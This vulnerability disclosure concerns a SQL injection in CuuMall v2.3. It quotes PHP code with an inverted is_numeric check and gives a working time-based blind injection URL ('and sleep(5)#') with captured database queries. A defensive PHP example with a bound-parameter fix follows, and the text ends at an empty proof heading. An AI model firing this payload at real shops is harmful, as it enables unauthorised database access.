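### Brief description:
A SQL injection in the latest version of CuuMall
### Details:
It looks as though the files on CuuMall's official site have been modified by someone, or else this is simply a bug in the code itself. Without further ado, here is the code.
DetailsAction.class.php (lines 282-313)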
```
public function add_pru( )
{
    $coo = new Cookie( );
    if ( $coo->is_set( c( "GUESTCOOK" )."mall-m-name" ) )
    {
        $this->assign( "waitSceond", 3 );
        $this->assign( "jumpUrl", "__APP__/Home/login" );
        // Message: "Please log in before adding the product to favorites"
        $this->error( "请登录后收藏商品" );
        exit( );
    }
    $id = $_GET['id'];
    // Inverted check: a numeric id is rejected, anything else passes
    if ( is_numeric( $id ) )
    {
        $this->assign( "waitSceond", 3 );
        $this->assign( "jumpUrl", "__APP__" );
        // Message: "Illegal parameter"
        $this->error( "非法参数" );
        exit( );
    }
    $addpru = new Model( "m_add" );
    // $id is concatenated into the WHERE clause unescaped
    $d_addpru = $addpru->where( "pruid=".$id )->find( );
    if ( empty( $d_addpru ) )
    {
    // (the excerpt ends here)
```
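Surprisingly, the check here treats a value that is numeric as an illegal parameter, whereas by normal logic it should reject values that are not numeric.
As a result, `$d_addpru = $addpru->where( "pruid=".$id )->find( );` is open to blind injection.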
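Request the URL:
```
192.168.10.70/cuumall_v2.3/v2.3/mall_upload/index.php/home/detail/index/id/2 and sleep(5)#
```
The response comes back delayed, and that is all it takes!!!
Here are the SQL statements captured on the back-end database:
```
2014/9/30 10:37 SELECT * FROM `cuu_sell_id` WHERE pro_id=1 and sleep(5)
2014/9/30 10:37 SELECT * FROM `cuu_pl_id` WHERE pro_id=1 and sleep(5)
```
There is a whole pile of sleep queries like these.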
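The inverted `is_numeric` check described above, set beside a corrected check and a bound-parameter lookup. This is an added example, not CuuMall code: the function names, the PDO/SQLite in-memory database and the sample row are assumptions made for the demonstration, and only the `m_add` / `pruid` names are taken from the excerpt.

```php
<?php
// Added example, not CuuMall code. Helper names and the SQLite in-memory
// database are hypothetical; the sample row is constructed.

// The check as written in the excerpt: numeric input is rejected,
// so only non-numeric strings are allowed through to the query.
function inverted_check(string $id): bool
{
    return !is_numeric($id);               // true means "allowed through"
}

// Corrected check: accept only a plain positive decimal integer.
function strict_check(string $id): bool
{
    return preg_match('/\A[1-9][0-9]{0,8}\z/', $id) === 1;
}

// Lookup with a bound integer parameter, so the value never becomes SQL text.
function find_favorite(PDO $db, string $id): ?array
{
    if (!strict_check($id)) {
        return null;                       // caller shows the "illegal parameter" error
    }
    $stmt = $db->prepare('SELECT * FROM m_add WHERE pruid = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE m_add (id INTEGER PRIMARY KEY, pruid INTEGER, name TEXT)');
$db->exec("INSERT INTO m_add (pruid, name) VALUES (2, 'constructed row')");

// Constructed inputs: a valid id, the value from the report, and a float-style string.
foreach (['2', '2 and sleep(5)#', '2e3'] as $input) {
    printf(
        "%-20s inverted_allows=%s strict_allows=%s row=%s\n",
        var_export($input, true),
        var_export(inverted_check($input), true),
        var_export(strict_check($input), true),
        json_encode(find_favorite($db, $input))
    );
}
```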
### Proof of vulnerability: